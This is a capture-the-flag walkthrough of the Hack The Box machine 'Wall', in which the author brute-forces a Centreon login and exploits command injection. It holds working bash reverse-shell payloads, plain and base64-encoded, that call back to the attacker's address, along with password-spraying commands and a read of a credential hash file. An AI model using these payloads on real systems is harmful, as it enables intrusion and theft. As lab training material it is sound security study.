Wall is a Medium linux box released back in September 2019.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
[ 192.168.0.32/24 ] [ /dev/pts/6 ] [~/_HTB/Wall]
→ sudo nmap -vvv -sTU -p- 10.10.10.157 --max-retries 0 -Pn --min-rate=1000 | grep Discovered
[sudo] password for nothing:
Discovered open port 80/tcp on 10.10.10.157
Discovered open port 22/tcp on 10.10.10.157
[ 192.168.0.32/24 ] [ /dev/pts/6 ] [~/_HTB/Wall]
→ nmap -sCV -p80,22 10.10.10.157
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-29 21:25 BST
Nmap scan report for 10.10.10.157
Host is up (0.090s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
| 256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_ 256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.52 seconds
Our nmap scan picked up port 80 so let's investigate it:
As expected, an ubuntu apache2 default page, so let's find which directories are available for us on this webserver using gobuster:
[ 192.168.0.32/24 ] [ /dev/pts/6 ] [~/_HTB/Wall]
→ gobuster dir -u http://10.10.10.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -t 50
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.157
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/04/29 21:31:24 Starting gobuster
===============================================================
/monitoring (Status: 401)
===============================================================
2020/04/29 21:34:24 Finished
===============================================================
And we seem to have only found /monitoring which is supposed to get a 401 status code which is an authentification prompt, so let's check it :
We can run hydra to bruteforce this authentification request:
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [/usr/share]
→ hydra -l admin -P /usr/share/SecLists/Passwords/darkweb2017-top1000.txt -f 10.10.10.157 http-get /monitoring
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-30 14:32:48
[DATA] max 16 tasks per 1 server, overall 16 tasks, 999 login tries (l:1/p:999), ~63 tries per task
[DATA] attacking http-get://10.10.10.157:80/monitoring
1 of 1 target completed, 0 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-30 14:33:08
However it doesn't seem to find it, so let's inspect it in burpsuite instead:
Intercept the request, send it to the repeater and here we see the 401 status code, However if we do a POST request instead (right click + change request method) we get something interesting:
We get a redirection to the /monitoring/ tab which is quite odd, and if we keep switching from GET to POST at some point we sumble upon this particular response:
Which hints us towards the /centreon webpage and obviously it's official documentation changelog:
Here we can see that the webserver is running an out of date centreon login page with plenty of possible exploits for us to use, Just by looking through the documentation from it's current version onwards (v. 19.04.0+) we should be able to find interesting things However these are all authenticated vulnerabilities, and therefore they would require credential, but from here we could also run searchsploit to find publicly available exploits for the centreon service:
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [/usr/share]
→ searchsploit centreon
------------------------------------------------------------ ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------ ----------------------------------------
Centreon - SQL Injection / Command Injection (Metasploit) | exploits/unix/remote/35078.rb
Centreon 1.4.2.3 - 'get_image.php' Remote File Disclosure | exploits/php/webapps/5204.py
Centreon 1.4.2.3 - 'index.php' Local File Inclusion | exploits/php/webapps/31318.txt
Centreon 19.04 - Remote Code Execution | exploits/php/webapps/47069.py
Centreon 19.04 - Authenticated Remote Code Execution (Metas | exploits/php/webapps/47948.rb
Centreon 19.10.5 - 'Pollers' Remote Command Execution | exploits/php/webapps/47977.txt
Centreon 19.10.5 - 'Pollers' Remote Command Execution (Meta | exploits/php/webapps/47994.rb
Centreon 19.10.5 - 'centreontrapd' Remote Command Execution | exploits/php/webapps/47978.txt
Centreon 19.10.5 - Database Credentials Disclosure | exploits/php/webapps/47968.txt
Centreon 19.10.5 - Remote Command Execution | exploits/php/webapps/47969.txt
Centreon 2.3.1 - 'command_name' Remote Command Execution | exploits/php/webapps/36293.txt
Centreon 2.5.3 - Remote Command Execution | exploits/php/webapps/39501.txt
Centreon 2.5.3 - Web Useralias Command Execution (Metasploi | exploits/python/remote/40170.rb
Centreon 2.5.4 - Multiple Vulnerabilities | exploits/php/webapps/37528.txt
Centreon 2.6.1 - Multiple Vulnerabilities | exploits/php/webapps/38339.txt
Centreon 2.5.1 / Centreon Enterprise Server 2.2 - SQL I | exploits/linux/webapps/41676.rb
Centreon Enterprise Server 2.3.3 2.3.9-4 - Blind SQL Inje | exploits/php/webapps/23362.py
Centreon IT & Network Monitoring 2.1.5 - SQL Injection | exploits/php/webapps/11979.pl
Oreon 1.4 / Centreon 1.4.1 - Multiple Remote File Inclusion | exploits/php/webapps/4735.txt
------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
Here we see a potential candidate which is the RCE python script number 47069:
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ locate 47069.py
/usr/share/exploitdb/exploits/php/webapps/47069.py
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ cp /usr/share/exploitdb/exploits/php/webapps/47069.py .
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ cat 47069.py | grep Usage
print("[~] Usage : ./centreon-exploit.py url username password ip port")
However as you can see here sadly it is also an authenticated exploit requiring the user, password and ip. So our next step is to simply intercept the login request and inspect it inside burpsuite's repeater (CTRL+R and CTRL+Shift+R):
Before sending this over to the repeater, we see that the request has a Cross Site Request Forgery token (CSRF token) This is used to prevent cross site forgery attacks not necessarily bruteforcing, To continue here we need to take another look at centreon's REST API documentation for the current version 19.04 just like for the Craft box:
So looking at this documentation we seem to need the parameters username and password, which we can check using curl:
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ curl 10.10.10.157/centreon/api/index.php?action=authenticate -d 'username=admin&password=test'
"Bad credentials"
So the form is correct but we have the wrong credentials obviously, we can also check it inside burpsuite using the following request:
POST /centreon/api/index.php?action=authenticate HTTP/1.1
Host: 10.10.10.157
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.157/centreon/
Content-Type: application/x-www-form-urlencoded
Content-Length: 28
DNT: 1
Connection: close
Cookie: PHPSESSID=s34ug6hb67uh93f7ud7aellmgs
Upgrade-Insecure-Requests: 1
username=admin&password=test
So as expected we get a 403 saying "Bad Credentials".
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ wfuzz -u http://10.10.10.157/centreon/api/index.php?action=authenticate -d 'username=admin&password=FUZZ' -w /usr/share/SecLists/Passwords/darkweb2017-top1000.txt
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.157/centreon/api/index.php?action=authenticate
Total requests: 999
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000004: 403 0 L 2 W 17 Ch "password"
000000006: 403 0 L 2 W 17 Ch "abc123"
000000010: 403 0 L 2 W 17 Ch "123123"
000000001: 403 0 L 2 W 17 Ch "123456"
000000003: 403 0 L 2 W 17 Ch "111111"
000000009: 403 0 L 2 W 17 Ch "1234567"
000000007: 403 0 L 2 W 17 Ch "12345678"
000000005: 403 0 L 2 W 17 Ch "qwerty"
000000002: 403 0 L 2 W 17 Ch "123456789"
000000008: 200 0 L 1 W 60 Ch "password1"
000000012: 403 0 L 2 W 17 Ch "000000"
[...]
000000300: 403 0 L 2 W 17 Ch "diamond"
^C
Finishing pending requests...
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ ^C
So here we get a bunch of 403s so we'll blacklist those using --hc (for hide code)
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ wfuzz -u http://10.10.10.157/centreon/api/index.php?action=authenticate -d 'username=admin&password=FUZZ' -w /usr/share/SecLists/Passwords/darkweb2017-top1000.txt --hc 403
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.157/centreon/api/index.php?action=authenticate
Total requests: 999
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000008: 200 0 L 1 W 61 Ch "password1"
Total time: 10.81323
Processed Requests: 999
Filtered Requests: 998
Requests/sec.: 92.38677
And we get a match for the username admin and his password "password1", so let's login:
So at this point we have credentials, and only now we have alot of exploits we can use, because apparently they are all authenticated exploits, with RCEs in particular, so we'll go for the following CVE-2019-13024 exploit which has an official python script made by mhaskar:
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ curl -sk https://raw.githubusercontent.com/mhaskar/CVE-2019-13024/master/Centreon-exploit.py > mhas
kar_rocks.py
[ 10.10.14.2/23 ] [ /dev/pts/5 ] [~/_HTB/Wall]
→ nano mhaskar_rocks.py
From here we see that the previous 47069.py we found was actually mhaskar's script, however it seems to be outdated, so we'll do it manually:
And this is where the RCE is, we can specify any binary we want, to test connectivity we'll try to ping ourselves back. However one thing to note is that the webservice doesn't accept spaces so we have to make sure we do not type in any space otherwise it will error out, so to go around this problem we'll go for the ${IFS} option:
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ echo 'ping -c1 10.10.14.8;'
ping -c1 10.10.14.8;
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ echo 'ping -c1 10.10.14.8;' | sed 's/ /${IFS}/g'
ping${IFS}-c1${IFS}10.10.14.8;
Once we made sure there is no spaces for us to error out, we inject our ping command and check if it worked with tcpdump, so hit save, then export configuration, then hit export and check the tcpdump output:
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ sudo tcpdump -i tun0 -n icmp
[sudo] password for nothing:
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
10:20:05.356841 IP 10.10.10.157 > 10.10.14.8: ICMP echo request, id 28117, seq 1, length 64
10:20:05.356882 IP 10.10.14.8 > 10.10.10.157: ICMP echo reply, id 28117, seq 1, length 64
And there we see that we have been able to recieve the ping icmp request from the machine. One important thing is that you must not forget the semicolon (;) at the end of the command otherwise the command execution will error out which is preety weird. Regardless we now know that the machine can communicate to us so let's craft our reverse shell payload, so redo the previous steps with the following payload and get a reverse shell through netcat:
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ echo "bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1';" | sed 's/ /${IFS}/g'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.10.14.8/9001${IFS}0>&1';
However for some reason this bash reverse shell seems to contain some characters the webservice doesn't like so let's try to go around it with a simple base64 encoding:
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ echo "bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1'" | base64
YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44LzkwMDEgMD4mMScK
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ echo "echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44LzkwMDEgMD4mMSc | base64 -d | bash;" | sed 's/ /${IFS}/g'
echo${IFS}YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44LzkwMDEgMD4mMSc${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash;
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.157] 51708
bash: cannot set terminal process group (983): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Wall:/usr/local/centreon/www$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data),6000(centreon)
www-data@Wall:/usr/local/centreon/www$ which python
which python
/usr/bin/python
And we get a reverse shell as www-data ! Like i said, do not forget the semicolon (;) at the end, which can easily be forgotten, so we are logged in as www-data and there is python, so let's upgrade it to a fully-interactive tty shell:
www-data@Wall:/usr/local/centreon/www$ which python
which python
/usr/bin/python
www-data@Wall:/usr/local/centreon/www$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Wall:/usr/local/centreon/www$ ^Z
[1]+ Stopped nc -lvnp 9001
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ stty -a | grep colum
speed 38400 baud; rows 45; columns 160; line = 0;
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ stty raw -echo
[ 10.10.14.8/23 ] [ /dev/pts/3 ] [~]
→ nc -lvnp 9001
reset
reset: unknown terminal type unknown
Terminal type? ^C
www-data@Wall:/usr/local/centreon/www$ export SHELL=bash
www-data@Wall:/usr/local/centreon/www$ export TERM=xterm-256color
www-data@Wall:/usr/local/centreon/www$ stty rows 45 columns 160
What we did here was:
- Check if python was there, spawn a tty shell with the pty library
- CTRL+Z (^Z) to background the reverse shell process
- stty -a | grep column to know what our current terminal's dimensions are
- stty raw -echo
- then type "fg" to bring back our reverse shell process in the foreground
- type in reset
- escape the "Terminal type?" question prompt
- export both our SHELL and TERM variables
- update our stty shell dimensions with the stty -a dimensions we saw earlier
And now with this we have a fully interactive reverse shell that has the correct dimensions, and with tab completion, which makes editing files with vim much easier. So let's try to see where the flag is:
www-data@Wall:/usr/local/centreon/www$ cd /home
www-data@Wall:/home$ ls -lash
total 16K
4.0K drwxr-xr-x 4 root root 4.0K Jul 4 2019 .
4.0K drwxr-xr-x 23 root root 4.0K Jul 4 2019 ..
4.0K drwxr-xr-x 6 shelby shelby 4.0K Jul 30 2019 shelby
4.0K drwxr-xr-x 5 sysmonitor sysmonitor 4.0K Jul 6 2019 sysmonitor
www-data@Wall:/home$ find . -type f
find: './sysmonitor/.gnupg': Permission denied
./sysmonitor/.wget-hsts
./sysmonitor/.bash_logout
./sysmonitor/.bashrc
./sysmonitor/.profile
find: './sysmonitor/.cache': Permission denied
find: './sysmonitor/.local/share': Permission denied
./sysmonitor/.sudo_as_admin_successful
find: './shelby/.gnupg': Permission denied
./shelby/html.zip
./shelby/.bash_logout
./shelby/.bashrc
./shelby/.rpmdb/Group
./shelby/.rpmdb/__db.001
./shelby/.rpmdb/Requirename
./shelby/.rpmdb/__db.003
./shelby/.rpmdb/Transfiletriggername
./shelby/.rpmdb/Suggestname
./shelby/.rpmdb/Supplementname
./shelby/.rpmdb/__db.002
./shelby/.rpmdb/Sigmd5
./shelby/.rpmdb/Recommendname
./shelby/.rpmdb/.dbenv.lock
./shelby/.rpmdb/Filetriggername
./shelby/.rpmdb/Providename
./shelby/.rpmdb/Dirnames
./shelby/.rpmdb/Basenames
./shelby/.rpmdb/Obsoletename
./shelby/.rpmdb/Packages
./shelby/.rpmdb/Sha1header
./shelby/.rpmdb/Enhancename
./shelby/.rpmdb/Conflictname
./shelby/.rpmdb/Triggername
./shelby/.rpmdb/Name
./shelby/.rpmdb/Installtid
./shelby/.profile
find: './shelby/.cache': Permission denied
./shelby/user.txt
find: './shelby/.local/share': Permission denied
www-data@Wall:/home$ cd shelby/
www-data@Wall:/home/shelby$ ls
html.zip user.txt
www-data@Wall:/home/shelby$ cat user.txt
cat: user.txt: Permission denied
And we see that the flag is located in /home/shelby/user.txt, but we don't have enough permissions to print it, so we need to privesc to the shelby user.
www-data@Wall:/home/shelby$ find . -type f -ls
find: './.gnupg': Permission denied
400169 8 -rw-rw-r-- 1 shelby shelby 4567 Jul 30 2019 ./html.zip
400126 4 -rw-r--r-- 1 shelby shelby 220 Apr 4 2018 ./.bash_logout
400127 4 -rw-r--r-- 1 shelby shelby 3771 Apr 4 2018 ./.bashrc
400147 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Group
400141 124 -rw-r--r-- 1 shelby shelby 270335 Jul 4 2019 ./.rpmdb/__db.001
400148 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Requirename
400143 120 -rw-r--r-- 1 shelby shelby 266239 Jul 4 2019 ./.rpmdb/__db.003
400158 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Transfiletriggername
400160 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Suggestname
400161 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Supplementname
400142 72 -rw-r--r-- 1 shelby shelby 73727 Jul 4 2019 ./.rpmdb/__db.002
400155 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Sigmd5
400159 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Recommendname
400140 0 -rw-r--r-- 1 shelby shelby 0 Jul 4 2019 ./.rpmdb/.dbenv.lock
400157 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Filetriggername
400149 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Providename
400153 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Dirnames
400146 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Basenames
400151 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Obsoletename
400144 8 -rw-r--r-- 1 shelby shelby 12288 Jul 4 2019 ./.rpmdb/Packages
400156 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Sha1header
400162 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Enhancename
400150 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Conflictname
400152 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Triggername
400145 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Name
400154 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 ./.rpmdb/Installtid
400128 4 -rw-r--r-- 1 shelby shelby 807 Apr 4 2018 ./.profile
find: './.cache': Permission denied
400138 4 -rw------- 1 shelby shelby 33 Jul 4 2019 ./user.txt
find: './.local/share': Permission denied
Here we have a html.zip file that looks interesting, so let's copy it in a temporary directory such as /tmp or /dev/shm:
www-data@Wall:/home/shelby$ cp html.zip /dev/shm
www-data@Wall:/home/shelby$ file /dev/shm/html.zip && md5sum /dev/shm/html.zip
/dev/shm/html.zip: Zip archive data, at least v1.0 to extract
5b339f84b6839bd5c445dc968ffe3677 /dev/shm/html.zip
www-data@Wall:/home/shelby$ cd /dev/shm/
www-data@Wall:/dev/shm$ ls
html.zip
www-data@Wall:/dev/shm$ unzip html.zip
Archive: html.zip
creating: html/
extracting: html/aa.php
inflating: html/index.html
inflating: html/panel.php
creating: html/monitoring/
inflating: html/monitoring/index.html
inflating: html/monitoring/.htaccess
The interesting thing here is .htaccess:
www-data@Wall:/dev/shm$ cd html
www-data@Wall:/dev/shm/html$ ls
aa.php index.html monitoring panel.php
www-data@Wall:/dev/shm/html$ cd monitoring
www-data@Wall:/dev/shm/html/monitoring$ cat .htaccess
AuthUserFile /etc/.htpasswd
AuthName "Protected area by the admin"
AuthType Basic
<Limit GET>
require valid-user
</Limit>
Here we see why the initial GET/POST request type switching worked, with this Limit GET line, however we are being hinted towards a /etc/.htpasswd so let's see what we can get out of it:
www-data@Wall:/dev/shm/html/monitoring$ cat /etc/.htpasswd
admin:$apr1$7hIqRwgr$.QPU0yknBQRTf3WW9jfFp.
And we seem to get a hash, we could try to use hashscat in conjunction with the rockyou.txt wordlist however sadly rockyou.txt doesn't contain the password for that this hash is, so we can consider this a rabbithole. Now from a forensic point of view we can examine shelby's files based on their timestamps, since we know that shelby's last interaction was from somewhere around july 2019.
www-data@Wall:/dev/shm/html/monitoring$ find / -type f -newermt 2019-07-03 ! -newermt 2019-07-31 -readable -ls 2>/dev/null | grep -v dist-packages
275056 4 -rw-r--r-- 1 root root 1168 Jul 30 2019 /opt/.shelby/backup
788648 160 -rw-r--r-- 1 root root 163442 Jul 4 2019 /share/man/man1/screen.1
788636 96 -rw-r--r-- 1 root root 95776 Jul 4 2019 /share/screen/utf8encodings/19
788642 4 -rw-r--r-- 1 root root 68 Jul 4 2019 /share/screen/utf8encodings/c6
788637 4 -rw-r--r-- 1 root root 536 Jul 4 2019 /share/screen/utf8encodings/a1
788639 4 -rw-r--r-- 1 root root 256 Jul 4 2019 /share/screen/utf8encodings/c2
788634 24 -rw-r--r-- 1 root root 24302 Jul 4 2019 /share/screen/utf8encodings/04
788632 28 -rw-r--r-- 1 root root 27550 Jul 4 2019 /share/screen/utf8encodings/02
788645 4 -rw-r--r-- 1 root root 68 Jul 4 2019 /share/screen/utf8encodings/cc
788641 4 -rw-r--r-- 1 root root 228 Jul 4 2019 /share/screen/utf8encodings/c4
788640 4 -rw-r--r-- 1 root root 140 Jul 4 2019 /share/screen/utf8encodings/c3
788647 4 -rw-r--r-- 1 root root 212 Jul 4 2019 /share/screen/utf8encodings/d6
788638 4 -rw-r--r-- 1 root root 232 Jul 4 2019 /share/screen/utf8encodings/bf
788643 4 -rw-r--r-- 1 root root 52 Jul 4 2019 /share/screen/utf8encodings/c7
788633 36 -rw-r--r-- 1 root root 32926 Jul 4 2019 /share/screen/utf8encodings/03
788646 4 -rw-r--r-- 1 root root 52 Jul 4 2019 /share/screen/utf8encodings/cd
788631 32 -rw-r--r-- 1 root root 29808 Jul 4 2019 /share/screen/utf8encodings/01
788635 56 -rw-r--r-- 1 root root 54862 Jul 4 2019 /share/screen/utf8encodings/18
788644 4 -rw-r--r-- 1 root root 40 Jul 4 2019 /share/screen/utf8encodings/c8
273100 1560 -rwsr-xr-x 1 root root 1595624 Jul 4 2019 /bin/screen-4.5.0
1075171 4 -rw-rw-r-- 1 centreon centreon 634 Jul 3 2019 /usr/local/centreon/log/statistics.log
143906 16 -rw-r--r-- 1 www-data www-data 15325 Jul 30 2019 /usr/local/centreon/GPL_LIB/SmartyCache/compile/%%EE^EE6^EE652FDC%%formMyAccount.ihtml.php
141228 4 -rw-r--r-- 1 root root 44 Jul 4 2019 /etc/subuid
273057 4 -rw-r--r-- 1 root root 527 Jul 4 2019 /etc/modsecurity/modsecurity.conf
131078 4 -rw-r--r-- 1 root root 188 Jul 30 2019 /etc/hosts
143933 4 -rw-r--r-- 1 root root 1629 Jul 4 2019 /etc/passwd
131220 4 -rw-r--r-- 1 root root 879 Jul 4 2019 /etc/group-
138666 4 -rw-r--r-- 1 root root 44 Jul 4 2019 /etc/subgid
143907 4 -rw-r--r-- 1 root root 3611 Jul 30 2019 /etc/mailcap
400121 4 -rw-rw-r-- 1 sysmonitor sysmonitor 173 Jul 4 2019 /home/sysmonitor/.wget-hsts
400169 8 -rw-rw-r-- 1 shelby shelby 4567 Jul 30 2019 /home/shelby/html.zip
400147 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Group
400141 124 -rw-r--r-- 1 shelby shelby 270335 Jul 4 2019 /home/shelby/.rpmdb/__db.001
400148 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Requirename
400143 120 -rw-r--r-- 1 shelby shelby 266239 Jul 4 2019 /home/shelby/.rpmdb/__db.003
400158 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Transfiletriggername
400160 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Suggestname
400161 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Supplementname
400142 72 -rw-r--r-- 1 shelby shelby 73727 Jul 4 2019 /home/shelby/.rpmdb/__db.002
400155 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Sigmd5
400159 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Recommendname
400140 0 -rw-r--r-- 1 shelby shelby 0 Jul 4 2019 /home/shelby/.rpmdb/.dbenv.lock
400157 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Filetriggername
400149 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Providename
400153 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Dirnames
400146 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Basenames
400151 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Obsoletename
400144 8 -rw-r--r-- 1 shelby shelby 12288 Jul 4 2019 /home/shelby/.rpmdb/Packages
400156 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Sha1header
400162 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Enhancename
400150 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Conflictname
400152 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Triggername
400145 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Name
400154 8 -rw-r--r-- 1 shelby shelby 8192 Jul 4 2019 /home/shelby/.rpmdb/Installtid
9 4 -rw-r--r-- 1 www-data www-data 154 Jul 4 2019 /dev/shm/html/monitoring/index.html
7 4 -rw-r--r-- 1 www-data www-data 47 Jul 4 2019 /dev/shm/html/panel.php
655701 12 -rw-r--r-- 1 root root 192064 Jul 4 2019 /var/log/faillog
655463 8 -rw-r--r-- 1 root root 4567 Jul 30 2019 /var/www/html.zip
671129 4 -rw-r--r-- 1 root root 47 Jul 4 2019 /var/www/html/panel.php
671103 4 -rw-r--r-- 1 root root 154 Jul 4 2019 /var/www/html/monitoring/index.html
667113 12 -rw-r--r-- 1 root root 10615 Jul 30 2019 /var/lib/dpkg/info/python-crypto.list
667208 4 -rw-r--r-- 1 root root 1657 Jul 30 2019 /var/lib/dpkg/info/python-pkg-resources.list
667048 4 -rw-r--r-- 1 root root 1184 Jul 30 2019 /var/lib/dpkg/info/libexpat1-dev:amd64.list
667189 4 -rw-r--r-- 1 root root 1570 Jul 30 2019 /var/lib/dpkg/info/python-keyrings.alt.list
667091 4 -rw-r--r-- 1 root root 64 Jul 30 2019 /var/lib/dpkg/info/python-all-dev.list
667181 4 -rw-r--r-- 1 root root 2996 Jul 30 2019 /var/lib/dpkg/info/python-keyring.list
667201 8 -rw-r--r-- 1 root root 5416 Jul 30 2019 /var/lib/dpkg/info/python-pip.list
667082 4 -rw-r--r-- 1 root root 517 Jul 30 2019 /var/lib/dpkg/info/python2.7-dev.list
667104 4 -rw-r--r-- 1 root root 297 Jul 30 2019 /var/lib/dpkg/info/python-cffi-backend.list
667135 4 -rw-r--r-- 1 root root 593 Jul 30 2019 /var/lib/dpkg/info/python-ipaddress.list
667070 4 -rw-r--r-- 1 root root 67 Jul 30 2019 /var/lib/dpkg/info/libpython-all-dev:amd64.list
667172 4 -rw-r--r-- 1 root root 750 Jul 30 2019 /var/lib/dpkg/info/python-secretstorage.list
667222 4 -rw-r--r-- 1 root root 1777 Jul 30 2019 /var/lib/dpkg/info/python-wheel.list
667151 8 -rw-r--r-- 1 root root 6981 Jul 30 2019 /var/lib/dpkg/info/python-cryptography.list
655480 4 -rw-r--r-- 1 root root 445 Jul 30 2019 /var/lib/dpkg/info/zip.list
667128 4 -rw-r--r-- 1 root root 889 Jul 30 2019 /var/lib/dpkg/info/python-idna.list
667165 4 -rw-r--r-- 1 root root 1878 Jul 30 2019 /var/lib/dpkg/info/python-gi.list
667076 4 -rw-r--r-- 1 root root 60 Jul 30 2019 /var/lib/dpkg/info/python-all.list
667229 4 -rw-r--r-- 1 root root 1028 Jul 30 2019 /var/lib/dpkg/info/python-xdg.list
667099 4 -rw-r--r-- 1 root root 2074 Jul 30 2019 /var/lib/dpkg/info/python-asn1crypto.list
667072 0 -rw-r--r-- 1 root root 0 Jul 30 2019 /var/lib/dpkg/info/libpython-all-dev:amd64.md5sums
667143 4 -rw-r--r-- 1 root root 574 Jul 30 2019 /var/lib/dpkg/info/python-six.list
667087 0 -rw-r--r-- 1 root root 0 Jul 30 2019 /var/lib/dpkg/info/python-dev.md5sums
